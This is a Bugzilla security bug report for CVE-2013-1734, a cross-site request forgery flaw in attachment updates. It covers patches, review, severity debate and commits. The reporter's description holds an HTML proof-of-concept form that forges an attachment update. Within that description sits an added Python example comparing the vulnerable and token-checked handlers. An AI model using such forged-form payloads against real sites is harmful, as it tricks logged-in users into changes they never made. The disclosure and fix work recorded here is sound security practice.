Bug 913904 (CVE-2013-1734)

[SECURITY] CSRF when updating attachments

RESOLVED FIXED in Bugzilla 4.0

Status

Product: Bugzilla
Component: Attachments & Requests
Priority: --
Severity: major
Status: RESOLVED FIXED
Reported: 4 years ago
Modified: 3 years ago

People

(Reporter: Mateusz Goik, Assigned: Frédéric Buclin)

Tracking

Keywords: sec-high, wsec-csrf
Version: 2.16
Target Milestone: Bugzilla 4.0
Bug Flags:
approval+
approval4.4+
blocking4.4.1+
approval4.2+
blocking4.2.7+
approval4.0+
blocking4.0.11+
sec-bounty+

Details

Attachments

(3 attachments)

(Reporter)

Description

4 years ago
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST">
      <input type="hidden" name="id" value="3100" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="contenttypemethod" value="manual" />
      <input type="hidden" name="delta&#95;ts" value="xxxxxx" />
      <input type="hidden" name="token" value="xxxxx" />
      <input type="hidden" name="description" value="asdasd123" />
      <input type="hidden" name="filename" value="file&#95;21994&#46;txt" />
      <input type="hidden" name="contenttypeentry" value="text&#47;plain" />
      <input type="hidden" name="comment" value="asd" />
      <input type="hidden" name="flag&#95;type&#45;4" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;4" value="" />
      <input type="hidden" name="flag&#95;type&#45;1" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;1" value="" />
      <input type="hidden" name="flag&#95;type&#45;2" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;2" value="" />
      <input type="hidden" name="flag&#95;type&#45;3" value="X" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
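Added example (editor's illustration, not the reporter's PoC and not Bugzilla's own attachment.cgi, which is Perl): a minimal model of the update handler before and after an anti-CSRF token check, in Python. The PoC above works because the victim's browser attaches the session cookie to a cross-site form POST; the cookie proves who the user is, not that the user meant to send this request. The fix is to require a value that only a page served by the site itself can contain. The token scheme used here (an HMAC over user, action, attachment id and delta_ts, keyed with a per-installation secret), the function names and the sample data are all assumptions made for this example. Note that delta_ts is not a secret: anyone who can view the bug can read it, so it serves only as the mid-air-collision check and the token must be the thing an attacker cannot forge.

```python
"""Model of attachment.cgi?action=update with and without a CSRF token check.

Added example, not Bugzilla code. Token scheme, names and data are assumptions.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

SERVER_SECRET = secrets.token_bytes(32)   # per-installation secret (assumed)


@dataclass
class Attachment:
    id: int
    description: str
    delta_ts: str            # last-modification timestamp of the record


def sample_store():
    """Constructed sample data: one attachment with the id the PoC targets."""
    return {3100: Attachment(3100, "original description", "2013-09-07 10:00:00")}


def issue_token(user_id, attachment_id, delta_ts):
    """Token the server embeds in the edit form it serves to the logged-in user.

    Binding it to delta_ts makes it valid only for the record as last seen."""
    msg = f"{user_id}|attachment.cgi:update|{attachment_id}|{delta_ts}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def update_vulnerable(store, user_id, params):
    """Pre-fix behaviour: the write goes through on the session cookie alone."""
    att = store[int(params["id"])]
    att.description = params["description"]
    return {"ok": True}


def update_fixed(store, user_id, params, now="2013-09-07 12:00:00"):
    """Fixed behaviour: token first, then the stale-record check, then the write."""
    att = store[int(params["id"])]
    delta_ts = params.get("delta_ts", "")
    token = params.get("token", "")
    expected = issue_token(user_id, att.id, delta_ts)
    # Constant-time compare; a missing or attacker-guessed token fails here,
    # before anything is written.
    if not hmac.compare_digest(expected, token):
        return {"ok": False, "error": "invalid_token"}
    # A genuine token issued before someone else changed the record is stale:
    # the mid-air collision case (the page's invalid_timestamp error name).
    if delta_ts != att.delta_ts:
        return {"ok": False, "error": "invalid_timestamp"}
    att.description = params["description"]
    att.delta_ts = now        # every successful write invalidates older tokens
    return {"ok": True}


def poc_params():
    """The fields the Burp-generated PoC submits, with its placeholder values."""
    return {"id": "3100", "action": "update", "delta_ts": "xxxxxx",
            "token": "xxxxx", "description": "asdasd123"}


def demo():
    victim = 42               # assumed user id of the logged-in victim
    # 1. Cross-site POST against the pre-fix handler: the edit lands.
    s1 = sample_store()
    r1 = update_vulnerable(s1, victim, poc_params())
    # 2. Same POST against the fixed handler: rejected, nothing written.
    s2 = sample_store()
    r2 = update_fixed(s2, victim, poc_params())
    after_forged = s2[3100].description
    # 3. Legitimate edit: the form the site served to the victim carried a real token.
    att = s2[3100]
    good = dict(poc_params(), delta_ts=att.delta_ts,
                token=issue_token(victim, 3100, att.delta_ts), description="legit")
    r3 = update_fixed(s2, victim, good)
    # 4. Replaying that same form after the write: the token is genuine but stale.
    r4 = update_fixed(s2, victim, good)
    return r1, s1[3100].description, r2, after_forged, r3, r4


if __name__ == "__main__":
    print(demo())
```

The order of checks matters: the token is verified before the record is touched, so a forged request is rejected even if the attacker supplies the correct, publicly visible delta_ts; the delta_ts comparison only catches a legitimately issued token that has gone stale.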
(Assignee)

Comment 1

4 years ago
Created attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

This patch is similar to the one for process_bug.cgi.
Assignee: attach-and-request → LpSolit
Status: NEW → ASSIGNED
Attachment #801238 - Flags: review?(dkl)
(Assignee)

Comment 2

4 years ago
All versions are affected as bug 476603 was an incomplete fix.
Blocks: 912643
Depends on: 476603
Flags: blocking4.4.1+
Flags: blocking4.2.7+
Flags: blocking4.0.11+
Summary: CSRF in attachment.cgi → [SECURITY] CSRF when updating attachments
Target Milestone: --- → Bugzilla 4.0
(Assignee)

Comment 3

4 years ago
Created attachment 801248 [details] [diff] [review]
patch for 4.2, v1
Attachment #801248 - Flags: review?(dkl)
(Assignee)

Comment 4

4 years ago
Created attachment 801251 [details] [diff] [review]
patch for 4.0, v1

I had to backport the invalid_timestamp error message which didn't exist before 4.2.
Attachment #801251 - Flags: review?(dkl)
Severity: normal → major
Flags: sec-bounty?
Keywords: sec-critical, wsec-csrf
Use CVE-2013-1734

Why sec-critical? This isn't compromising bugzilla in general. Beyond vandalism what's the worst you could do here? Luring a privileged user to un-hide an attachment maybe, revealing a security bug? My initial feel was moderate, but given hidden attachments I could live with sec-high.
Alias: CVE-2013-1734
Keywords: sec-critical → sec-high
Comment on attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

Review of attachment 801238 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #801238 - Flags: review?(dkl) → review+
Comment on attachment 801248 [details] [diff] [review]
patch for 4.2, v1

Review of attachment 801248 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #801248 - Flags: review?(dkl) → review+
Comment on attachment 801251 [details] [diff] [review]
patch for 4.0, v1

Review of attachment 801251 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #801251 - Flags: review?(dkl) → review+

Updated

4 years ago
Flags: approval?
Flags: approval4.4?
Flags: approval4.2?
Flags: approval4.0?

Updated

4 years ago
Flags: approval?
Flags: approval4.4?
Flags: approval4.4+
Flags: approval4.2?
Flags: approval4.2+
Flags: approval4.0?
Flags: approval4.0+
Flags: approval+
Flags: sec-bounty? → sec-bounty+
(Assignee)

Updated

4 years ago
Version: unspecified → 2.16
(Assignee)

Comment 10

4 years ago
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified attachment.cgi
Committed revision 8778.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified attachment.cgi
Committed revision 8624.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.2/
modified attachment.cgi
Committed revision 8232.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.0/
modified attachment.cgi
modified template/en/default/global/code-error.html.tmpl
Committed revision 7760.
Status: ASSIGNED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → FIXED

Updated

4 years ago
Group: bugzilla-security
(Assignee)

Comment 11

4 years ago
Security advisory sent.